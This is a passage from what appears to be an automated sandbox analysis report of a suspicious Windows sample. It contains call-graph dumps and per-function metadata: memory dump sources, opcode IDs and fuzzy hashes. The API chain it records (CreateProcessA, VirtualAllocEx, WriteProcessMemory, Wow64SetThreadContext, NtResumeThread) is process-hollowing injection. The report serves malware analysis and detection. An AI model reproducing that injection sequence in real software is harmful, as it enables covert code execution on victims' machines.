69841->69842 69844 56ff158 NtResumeThread 69842->69844 69845 56ff160 NtResumeThread 69842->69845 69843 56f630e 69844->69843 69845->69843 69847 56f5f7a 69846->69847 69849 56fdf08 WriteProcessMemory 69847->69849 69850 56fdf10 WriteProcessMemory 69847->69850 69848 56f4f57 69848->69764 69849->69848 69850->69848 69852 56f5cd5 69851->69852 69854 56fe5c8 Wow64SetThreadContext 69852->69854 69855 56fe5d0 Wow64SetThreadContext 69852->69855 69853 56f5d0c 69854->69853 69855->69853 69857 56f5a43 69856->69857 69859 56fdf08 WriteProcessMemory 69857->69859 69860 56fdf10 WriteProcessMemory 69857->69860 69858 56f5445 69859->69858 69860->69858 69862 56ff161 NtResumeThread 69861->69862 69864 56ff1dd 69862->69864 69864->69806 69866 56ff15c NtResumeThread 69865->69866 69868 56ff1dd 69866->69868 69868->69806 69870 56feb71 VirtualAllocEx 69869->69870 69872 56febed 69870->69872 69872->69811 69874 56feb6c VirtualAllocEx 69873->69874 69876 56febed 69874->69876 69876->69811 69878 56fdf11 WriteProcessMemory 69877->69878 69880 56fdfaf 69878->69880 69880->69821 69882 56fdf0c WriteProcessMemory 69881->69882 69884 56fdfaf 69882->69884 69884->69821 69886 56fe5cc Wow64SetThreadContext 69885->69886 69888 56fe65d 69886->69888 69888->69826 69890 56fe5d1 Wow64SetThreadContext 69889->69890 69892 56fe65d 69890->69892 69892->69826 69894 56f6b4b 69893->69894 69895 56f6b53 69894->69895 69916 56f6b90 4 API calls 69894->69916 69993 56f718b 69894->69993 69996 56f6c10 69894->69996 69999 56f6cb0 69894->69999 70002 56f72d7 69894->70002 70005 56f6cf1 69894->70005 70008 56f6c77 69894->70008 70011 56f6ff7 69894->70011 70014 56f7659 69894->70014 70017 56f7299 69894->70017 70020 56f731e 69894->70020 70026 56f6e3c 69894->70026 70029 56f7262 69894->70029 70032 56f727f 69894->70032 70035 56f6c03 69894->70035 70038 56f7483 69894->70038 70041 56f70a5 69894->70041 70044 56f6ca4 69894->70044 70047 56f75e6 69894->70047 70050 56f6dc5 69894->70050 70053 56f6fab 69894->70053 69895->69831 69916->69895 69918 56f6ba1 69917->69918 69919 56f6bd9 69918->69919 69920 56f6fab 2 API calls 69918->69920 69921 56f718b 2 API calls 69918->69921 69922 56f75e6 2 API calls 69918->69922 69923 56f6dc5 2 API calls 69918->69923 69924 56f70a5 2 API calls 69918->69924 69925 56f6ca4 2 API calls 69918->69925 69926 56f6c03 2 API calls 69918->69926 69927 56f7483 2 API calls 69918->69927 69928 56f7262 2 API calls 69918->69928 69929 56f727f 2 API calls 69918->69929 69930 56f731e 4 API calls 69918->69930 69931 56f6e3c 2 API calls 69918->69931 69932 56f7659 2 API calls 69918->69932 69933 56f7299 2 API calls 69918->69933 69934 56f6c77 2 API calls 69918->69934 69935 56f6ff7 2 API calls 69918->69935 69936 56f72d7 2 API calls 69918->69936 69937 56f6cf1 2 API calls 69918->69937 69938 56f6c10 2 API calls 69918->69938 69939 56f6cb0 2 API calls 69918->69939 69940 56f6b90 4 API calls 69918->69940 69919->69831 69920->69919 69921->69919 69922->69919 69923->69919 69924->69919 69925->69919 69926->69919 69927->69919 69928->69919 69929->69919 69930->69919 69931->69919 69932->69919 69933->69919 69934->69919 69935->69919 69936->69919 69937->69919 69938->69919 69939->69919 69940->69919 69942 56f6b93 69941->69942 69945 56f6c09 69941->69945 69944 56f6b9a 69942->69944 69942->69945 69943 56f6bd9 69943->69831 69944->69943 69947 56f6fab 2 API calls 69944->69947 69948 56f718b 2 API calls 69944->69948 69949 56f75e6 2 API calls 69944->69949 69950 56f6dc5 2 API calls 69944->69950 69951 56f70a5 2 API calls 69944->69951 69952 56f6ca4 2 API calls 69944->69952 69953 56f6c03 2 API calls 69944->69953 69954 56f7483 2 API calls 69944->69954 69955 56f7262 2 API calls 69944->69955 69956 56f727f 2 API calls 69944->69956 69957 56f731e 4 API calls 69944->69957 69958 56f6e3c 2 API calls 69944->69958 69959 56f7659 2 API calls 69944->69959 69960 56f7299 2 API calls 69944->69960 69961 56f6c77 2 API calls 69944->69961 69962 56f6ff7 2 API calls 69944->69962 69963 56f72d7 2 API calls 69944->69963 69964 56f6cf1 2 API calls 69944->69964 69965 56f6c10 2 API calls 69944->69965 69966 56f6cb0 2 API calls 69944->69966 69967 56f6b90 4 API calls 69944->69967 69946 56fd293 2 API calls 69945->69946 69946->69945 69947->69943 69948->69943 69949->69943 69950->69943 69951->69943 69952->69943 69953->69943 69954->69943 69955->69943 69956->69943 69957->69943 69958->69943 69959->69943 69960->69943 69961->69943 69962->69943 69963->69943 69964->69943 69965->69943 69966->69943 69967->69943 69969 56f6a02 69968->69969 69970 56f6b53 69969->69970 69972 56f6fab 2 API calls 69969->69972 69973 56f718b 2 API calls 69969->69973 69974 56f75e6 2 API calls 69969->69974 69975 56f6dc5 2 API calls 69969->69975 69976 56f70a5 2 API calls 69969->69976 69977 56f6ca4 2 API calls 69969->69977 69978 56f6c03 2 API calls 69969->69978 69979 56f7483 2 API calls 69969->69979 69980 56f7262 2 API calls 69969->69980 69981 56f727f 2 API calls 69969->69981 69982 56f731e 4 API calls 69969->69982 69983 56f6e3c 2 API calls 69969->69983 69984 56f7659 2 API calls 69969->69984 69985 56f7299 2 API calls 69969->69985 69986 56f6c77 2 API calls 69969->69986 69987 56f6ff7 2 API calls 69969->69987 69988 56f72d7 2 API calls 69969->69988 69989 56f6cf1 2 API calls 69969->69989 69990 56f6c10 2 API calls 69969->69990 69991 56f6cb0 2 API calls 69969->69991 69992 56f6b90 4 API calls 69969->69992 69970->69831 69971 56f6bd9 69971->69831 69972->69971 69973->69971 69974->69971 69975->69971 69976->69971 69977->69971 69978->69971 69979->69971 69980->69971 69981->69971 69982->69971 69983->69971 69984->69971 69985->69971 69986->69971 69987->69971 69988->69971 69989->69971 69990->69971 69991->69971 69992->69971 69994 56f6c55 69993->69994 70056 56fd293 69994->70056 69997 56f6c43 69996->69997 69998 56fd293 2 API calls 69997->69998 69998->69997 70000 56f6c55 69999->70000 70001 56fd293 2 API calls 70000->70001 70001->70000 70003 56f6c55 70002->70003 70004 56fd293 2 API calls 70003->70004 70004->70003 70007 56f6c55 70005->70007 70006 56fd293 2 API calls 70006->70007 70007->70006 70009 56f6c55 70008->70009 70010 56fd293 2 API calls 70009->70010 70010->70009 70012 56f6c55 70011->70012 70013 56fd293 2 API calls 70012->70013 70013->70012 70015 56f6c55 70014->70015 70016 56fd293 2 API calls 70015->70016 70016->70015 70018 56f6c55 70017->70018 70019 56fd293 2 API calls 70018->70019 70019->70018 70025 56f732d 70020->70025 70065 56fceb8 70025->70065 70069 56fceac 70025->70069 70027 56f6c55 70026->70027 70028 56fd293 2 API calls 70027->70028 70028->70027 70030 56f6c55 70029->70030 70031 56fd293 2 API calls 70030->70031 70031->70030 70033 56f6c55 70032->70033 70034 56fd293 2 API calls 70033->70034 70034->70033 70036 56f6c0d 70035->70036 70037 56fd293 2 API calls 70036->70037 70037->70036 70039 56f6c55 70038->70039 70040 56fd293 2 API calls 70039->70040 70040->70039 70042 56f6c55 70041->70042 70043 56fd293 2 API calls 70042->70043 70043->70042 70045 56f6c55 70044->70045 70046 56fd293 2 API calls 70045->70046 70046->70045 70048 56f6c55 70047->70048 70049 56fd293 2 API calls 70048->70049 70049->70048 70051 56f6c55 70050->70051 70051->70050 70052 56fd293 2 API calls 70051->70052 70052->70051 70054 56f6c55 70053->70054 70055 56fd293 2 API calls 70054->70055 70055->70054 70057 56fd2ad 70056->70057 70060 56fd938 70057->70060 70058 56fd2c3 70058->69994 70061 56fd947 70060->70061 70063 56fdf08 WriteProcessMemory 70061->70063 70064 56fdf10 WriteProcessMemory 70061->70064 70062 56fd493 70063->70062 70064->70062 70066 56fcf1c CreateProcessA 70065->70066 70068 56fd0a4 70066->70068 70070 56fcf1c CreateProcessA 70069->70070 70072 56fd0a4 70070->70072

                                                                                                  Executed Functions

                                                                                                  Function 026C4277 Relevance: 2.7, Strings: 1, Instructions: 1487COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 283 26c4277 284 26c427d 283->284 285 26c42ee-26c42f1 284->285 286 26c427f-26c4286 284->286 287 26c4380 285->287 288 26c41e2-26c41e5 286->288 289 26c4381 287->289 290 26c421b-26c4223 288->290 292 26c43ec-26c43f5 289->292 291 26c41ec-26c41f5 290->291 295 26c41fe-26c4203 291->295 296 26c41f7 291->296 293 26c43fe-26c4403 292->293 294 26c43f7 292->294 293->292 294->293 297 26c4438-26c446d 294->297 298 26c4405-26c4436 294->298 299 26c4472-26c4560 294->299 295->291 296->287 296->288 296->290 296->295 296->297 296->298 296->299 300 26c422f-26c4237 296->300 301 26c428b-26c429b 296->301 302 26c42cb-26c42ce 296->302 303 26c4205-26c420d 296->303 304 26c4225-26c422d 296->304 305 26c4245-26c424d 296->305 306 26c41e7-26c41ea 296->306 307 26c42a0-26c42a3 296->307 308 26c4262-26c4264 296->308 309 26c4362-26c4365 296->309 310 26c431c-26c431f 296->310 311 26c433f-26c4342 296->311 312 26c425b-26c4260 296->312 313 26c4274 296->313 314 26c42f6-26c42f9 296->314 297->292 298->292 316 26c5876-26c587e 299->316 356 26c4566 299->356 300->287 300->297 300->298 300->299 300->301 300->302 300->305 300->307 300->308 300->309 300->310 300->311 300->312 300->313 300->314 301->288 302->316 317 26c42d4-26c42e7 302->317 303->287 303->288 303->290 303->297 303->298 303->299 303->300 303->301 303->302 303->304 303->305 303->307 303->308 303->309 303->310 303->311 303->312 303->313 303->314 304->306 305->297 305->298 305->299 305->302 305->307 305->309 305->310 305->311 305->312 305->314 306->295 315 26c42a9-26c42bc 307->315 307->316 308->289 325 26c426a-26c426f 308->325 309->316 322 26c436b-26c4376 309->322 310->316 319 26c4325-26c4333 310->319 311->316 320 26c4348-26c4356 311->320 312->288 313->283 314->316 318 26c42ff-26c4310 314->318 315->316 327 26c42c2-26c42c6 315->327 317->316 329 26c42ed 317->329 318->316 330 26c4316-26c431a 318->330 319->316 331 26c4339-26c433d 319->331 320->316 332 26c435c-26c4360 320->332 322->316 333 26c437c 322->333 325->288 327->287 329->285 330->287 331->287 332->287 333->287 357 26c456e-26c4787 356->357 357->316 370 26c478d-26c48b0 357->370 370->316 377 26c48b6-26c49f0 370->377 377->316 384 26c49f6-26c4b19 377->384 384->316 391 26c4b1f-26c541f 384->391 391->292
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: jjjjjj
                                                                                                  • API String ID: 0-3900813449
                                                                                                  • Opcode ID: 81808e0ce580c23ad3959e8c61d2a323aa03f07510d9acc4b7d7b1501012ebf6
                                                                                                  • Instruction ID: fe13644612cc87e1876040dfe0994df94f334450fcfd3ec9df9deaaf17cba26b
                                                                                                  • Opcode Fuzzy Hash: 81808e0ce580c23ad3959e8c61d2a323aa03f07510d9acc4b7d7b1501012ebf6
                                                                                                  • Instruction Fuzzy Hash: 85E23A7A250510EFDB4A9F98D988D54BBB2FF4D32471A81D8F2099B236C732D861EF50
                                                                                                  Function 06210040 Relevance: 2.6, Strings: 1, Instructions: 1335COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 622 6210040-621006e 624 6210070 622->624 625 6210075-6210197 622->625 624->625 629 6210199-62101af 625->629 630 62101bb-62101c7 625->630 908 62101b5 call 6212bc0 629->908 909 62101b5 call 6212bc8 629->909 910 62101b5 call 6212bcd 629->910 631 62101c9 630->631 632 62101ce-62101d3 630->632 631->632 634 62101d5-62101e1 632->634 635 621020b-6210254 632->635 636 62101e3 634->636 637 62101e8-6210206 634->637 643 6210256 635->643 644 621025b-6210520 635->644 636->637 638 621196f-6211975 637->638 640 62119a0 638->640 641 6211977-6211997 638->641 645 62119a1 640->645 641->640 643->644 671 6210f50-6210f5c 644->671 645->645 672 6210f62-6210f9a 671->672 673 6210525-6210531 671->673 682 6211074-621107a 672->682 674 6210533 673->674 675 6210538-621065d 673->675 674->675 710 621069d-6210726 675->710 711 621065f-6210697 675->711 683 6211080-62110b8 682->683 684 6210f9f-621101c 682->684 694 6211416-621141c 683->694 699 621104f-6211071 684->699 700 621101e-6211022 684->700 697 6211422-621146a 694->697 698 62110bd-62112bf 694->698 707 62114e5-621150e 697->707 708 621146c-62114df 697->708 791 62112c5-6211359 698->791 792 621135e-6211362 698->792 699->682 700->699 703 6211024-621104c 700->703 703->699 723 6211516-6211530 707->723 708->707 738 6210735-62107b9 710->738 739 6210728-6210730 710->739 711->710 728 6211939-621193f 723->728 731 6211535-62115b7 728->731 732 6211945-621196d 728->732 751 62115b9-62115d4 731->751 752 62115df-62115eb 731->752 732->638 764 62107c8-621084c 738->764 765 62107bb-62107c3 738->765 741 6210f41-6210f4d 739->741 741->671 751->752 754 62115f2-62115fe 752->754 755 62115ed 752->755 756 6211611-6211620 754->756 757 6211600-621160c 754->757 755->754 762 6211622 756->762 763 6211629-6211901 756->763 761 6211920-6211936 757->761 761->728 762->763 766 62117f6-621185e 762->766 767 6211788-62117f1 762->767 768 621171a-6211783 762->768 769 621169d-6211715 762->769 770 621162f-6211698 762->770 797 621190c-6211918 763->797 814 621085b-62108df 764->814 815 621084e-6210856 764->815 765->741 803 62118d2-62118d8 766->803 767->797 768->797 769->797 770->797 816 62113fd-6211413 791->816 798 6211364-62113bd 792->798 799 62113bf-62113fc 792->799 797->761 798->816 799->816 805 6211860-62118be 803->805 806 62118da-62118e4 803->806 819 62118c0 805->819 820 62118c5-62118cf 805->820 806->797 829 62108e1-62108e9 814->829 830 62108ee-6210972 814->830 815->741 816->694 819->820 820->803 829->741 836 6210981-6210a05 830->836 837 6210974-621097c 830->837 843 6210a14-6210a98 836->843 844 6210a07-6210a0f 836->844 837->741 850 6210aa7-6210b2b 843->850 851 6210a9a-6210aa2 843->851 844->741 857 6210b3a-6210bbe 850->857 858 6210b2d-6210b35 850->858 851->741 864 6210bc0-6210bc8 857->864 865 6210bcd-6210c51 857->865 858->741 864->741 871 6210c60-6210ce4 865->871 872 6210c53-6210c5b 865->872 878 6210cf3-6210d77 871->878 879 6210ce6-6210cee 871->879 872->741 885 6210d86-6210e0a 878->885 886 6210d79-6210d81 878->886 879->741 892 6210e19-6210e9d 885->892 893 6210e0c-6210e14 885->893 886->741 899 6210eac-6210f30 892->899 900 6210e9f-6210ea7 892->900 893->741 906 6210f32-6210f3a 899->906 907 6210f3c-6210f3e 899->907 900->741 906->741 907->741 908->630 909->630 910->630
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2
                                                                                                  • API String ID: 0-450215437
                                                                                                  • Opcode ID: 5c9d1e3071b44955e39613872cad5c07431fa18afb25d7c0e8018ad1f7b5dd69
                                                                                                  • Instruction ID: 619d7edc4f202def83a8c572bdfbac38daeabeaa152e6d709b6803a52d3c560c
                                                                                                  • Opcode Fuzzy Hash: 5c9d1e3071b44955e39613872cad5c07431fa18afb25d7c0e8018ad1f7b5dd69
                                                                                                  • Instruction Fuzzy Hash: 08E2B074A04628CFDBA5DF69DC84A9ABBF6FB89305F1081E9D909A7354DB305E81CF40
                                                                                                  Function 062E0040 Relevance: 2.4, Strings: 1, Instructions: 1105COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4
                                                                                                  • API String ID: 0-4088798008
                                                                                                  • Opcode ID: 2f275899f0f8f9198e51ee90f98a724b21e22ab7178ed512dc11ad9439513b6d
                                                                                                  • Instruction ID: 2f2e027fc9c19dd698df78c112f004ba26347261bd175c04aac3f7ef5cf09598
                                                                                                  • Opcode Fuzzy Hash: 2f275899f0f8f9198e51ee90f98a724b21e22ab7178ed512dc11ad9439513b6d
                                                                                                  • Instruction Fuzzy Hash: F3B20B34A10219CFDB54DF94C994BADB7B6FF48300F5485A9E905AB3A5CBB0AD82CF50
                                                                                                  Function 056F8C18 Relevance: 1.9, Strings: 1, Instructions: 610COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1311 56f8c18-56f8c39 1313 56f8c3b 1311->1313 1314 56f8c40-56f8d13 call 56f9759 1311->1314 1313->1314 1321 56f8d15-56f8d20 1314->1321 1322 56f8d22 1314->1322 1323 56f8d2c-56f8e47 1321->1323 1322->1323 1334 56f8e59-56f8e84 1323->1334 1335 56f8e49-56f8e4f 1323->1335 1336 56f9638-56f9654 1334->1336 1335->1334 1337 56f965a-56f9675 1336->1337 1338 56f8e89-56f8fec call 56f7838 1336->1338 1349 56f8ffe-56f9106 call 56faef0 1338->1349 1350 56f8fee-56f8ff4 1338->1350 1357 56f910c-56f917b 1349->1357 1350->1349 1360 56f917d-56f9181 1357->1360 1361 56f91e0-56f91ea 1357->1361 1363 56f9189-56f91db 1360->1363 1364 56f9183-56f9184 1360->1364 1362 56f9411-56f9430 1361->1362 1366 56f91ef-56f9335 call 56f7838 1362->1366 1367 56f9436-56f9460 1362->1367 1365 56f94b6-56f9521 1363->1365 1364->1365 1384 56f9533-56f957e 1365->1384 1385 56f9523-56f9529 1365->1385 1396 56f933b-56f9407 call 56f7838 1366->1396 1397 56f940a-56f940b 1366->1397 1372 56f94b3-56f94b4 1367->1372 1373 56f9462-56f94b0 1367->1373 1372->1365 1373->1372 1386 56f961d-56f9635 1384->1386 1387 56f9584-56f961c 1384->1387 1385->1384 1386->1336 1387->1386 1396->1397 1397->1362
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8
                                                                                                  • API String ID: 0-4194326291
                                                                                                  • Opcode ID: e76970d853d4ee03eda1f7b1962f27d8b36dedbbbd2d9d3b19ab07e858dcca3a
                                                                                                  • Instruction ID: 4e00a33e62c48e65668b266d5971d228582c16cd87c78b16042bd1f1062d4b8b
                                                                                                  • Opcode Fuzzy Hash: e76970d853d4ee03eda1f7b1962f27d8b36dedbbbd2d9d3b19ab07e858dcca3a
                                                                                                  • Instruction Fuzzy Hash: AB52D575D016298FDBA4DF69CC50AD9B7B2FB89304F5082EAD519A7354DB30AE81CF40
                                                                                                  Function 062E0367 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4
                                                                                                  • API String ID: 0-4088798008
                                                                                                  • Opcode ID: 7dc884119b47066fa79a621735841cb4d622fa9e35ab61f467ec8e8201263323
                                                                                                  • Instruction ID: 5c7d7d0869305f9355b6ab0abdc8bdfe51800066b2086b339e959958adffa0a9
                                                                                                  • Opcode Fuzzy Hash: 7dc884119b47066fa79a621735841cb4d622fa9e35ab61f467ec8e8201263323
                                                                                                  • Instruction Fuzzy Hash: DC222B34A10219CFDB64DF65C994BADB7B2FF48300F5481A9D909AB395DBB0AD82CF50
                                                                                                  Function 056FF158 Relevance: 1.6, APIs: 1, Instructions: 58nativethreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 056FF1CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: 4a199d86ebf37b011880e45530bac797b93cdcb661664f3064f903efd177bd40
                                                                                                  • Instruction ID: fd1a20ccd9a5c4df3059de1716dec24569980a43e56cd99329a703559ca93177
                                                                                                  • Opcode Fuzzy Hash: 4a199d86ebf37b011880e45530bac797b93cdcb661664f3064f903efd177bd40
                                                                                                  • Instruction Fuzzy Hash: DF11F4B1D002098BDB10DFAAC485A9FFBF4EF98620F14842AD519A7240DB75A944CFA5
                                                                                                  Function 056FF160 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 056FF1CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: d617487061da94abda270753b20c5b5ca8d44df0572283092488c9f3e17fc16e
                                                                                                  • Instruction ID: 7d9f7942c13dd55f96507f2c6a93a33386b75d37b0d28c2dff944b3cde61c11b
                                                                                                  • Opcode Fuzzy Hash: d617487061da94abda270753b20c5b5ca8d44df0572283092488c9f3e17fc16e
                                                                                                  • Instruction Fuzzy Hash: DD1114B1D003098FDB10DFAAC484B9EFBF4FF88220F10842AD519A7240CB79A904CFA5
                                                                                                  Function 0631E810 Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: 1b76fe734a1b1350dbc512a64b734634c1b4241b840cb523af83ce60d5a45267
                                                                                                  • Instruction ID: a992161b2761c58830fc30edd8e8dd5897147cda9fd0dc33014be56e7fbce2f6
                                                                                                  • Opcode Fuzzy Hash: 1b76fe734a1b1350dbc512a64b734634c1b4241b840cb523af83ce60d5a45267
                                                                                                  • Instruction Fuzzy Hash: 2CC1EF70D09218CFEB88CFA9D444BEDBBF9FB49304F159129D819AB250D3B69885CF94
                                                                                                  Function 056F8C08 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: h
                                                                                                  • API String ID: 0-2439710439
                                                                                                  • Opcode ID: 21ab56492cb0524eca6a2bc742ad6afafe0965454c3a5a86d9a641189a279369
                                                                                                  • Instruction ID: 6ff96ee8aadaa585a7ab6d22c031b21d78eb80973a791db7ebac75b24af2261f
                                                                                                  • Opcode Fuzzy Hash: 21ab56492cb0524eca6a2bc742ad6afafe0965454c3a5a86d9a641189a279369
                                                                                                  • Instruction Fuzzy Hash: 3C71E471D01628CBEB64DF69CC50BDAB7B2FF89304F5082EAD519A7254EB306A85CF50
                                                                                                  Function 026CB8E8 Relevance: 1.0, Instructions: 956COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d3e5a022509e87e6405f2374faf32dd93e30faec60551ea34c6ee0c88ec2b1e0
                                                                                                  • Instruction ID: e8836c8dd353d6a670fbfda55bc9b55fe0527efb2c74f91983408fad9fd528aa
                                                                                                  • Opcode Fuzzy Hash: d3e5a022509e87e6405f2374faf32dd93e30faec60551ea34c6ee0c88ec2b1e0
                                                                                                  • Instruction Fuzzy Hash: 0FA2C375A00628CFDB65DF69C984A99BBB2FF89304F1581E9D50DAB321DB319E81CF40
                                                                                                  Function 062119A3 Relevance: .5, Instructions: 539COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 578d0933e427b0f9ad9ee063cf2b57b4e684a9f52e7378d4bae7711180445511
                                                                                                  • Instruction ID: 5c381935720de2d8cc36eaec21ce4920db27e8fd2a24da50fb7c3e1255cfaf1a
                                                                                                  • Opcode Fuzzy Hash: 578d0933e427b0f9ad9ee063cf2b57b4e684a9f52e7378d4bae7711180445511
                                                                                                  • Instruction Fuzzy Hash: C552A074A05628CFCBA4DB28CD84B9ABBF6FB49305F1091D9990DA7355DB30AE81CF50
                                                                                                  Function 061EAEA8 Relevance: .4, Instructions: 408COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3522559543.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fb2148d5320eed8f737d6c51c45efdb642cd07e08f0295bc6e739a218f17e587
                                                                                                  • Instruction ID: a15f2990b2e3894a42f1b4a9b079a00c13766ae37dd1b1755641c3650105bd71
                                                                                                  • Opcode Fuzzy Hash: fb2148d5320eed8f737d6c51c45efdb642cd07e08f0295bc6e739a218f17e587
                                                                                                  • Instruction Fuzzy Hash: 0C020370E05629CFEBA8DF69C944BADB7B2FF89304F1085AAD409A7254D7749E81CF40
                                                                                                  Function 061D3C18 Relevance: .3, Instructions: 299COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3521313599.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61d0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3dbd728bb869c8d5ad88df899d6d40cc1ecf7dd57bfe18f3005a21d81735ef9
                                                                                                  • Instruction ID: 3b967c41b9a03343dd7ed3de9108f4520be5694c7433d216f82a6cefef326ac5
                                                                                                  • Opcode Fuzzy Hash: a3dbd728bb869c8d5ad88df899d6d40cc1ecf7dd57bfe18f3005a21d81735ef9
                                                                                                  • Instruction Fuzzy Hash: 4BD12970E05218CFEBA8CF69D844BAEB7F2FB4A304F1084A9D419A7295D7B45D85CF42
                                                                                                  Function 056F3B20 Relevance: .3, Instructions: 292COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ad7eab7abb5902611899c73d6c0c20755a70548f136c2505111285f316f01c7f
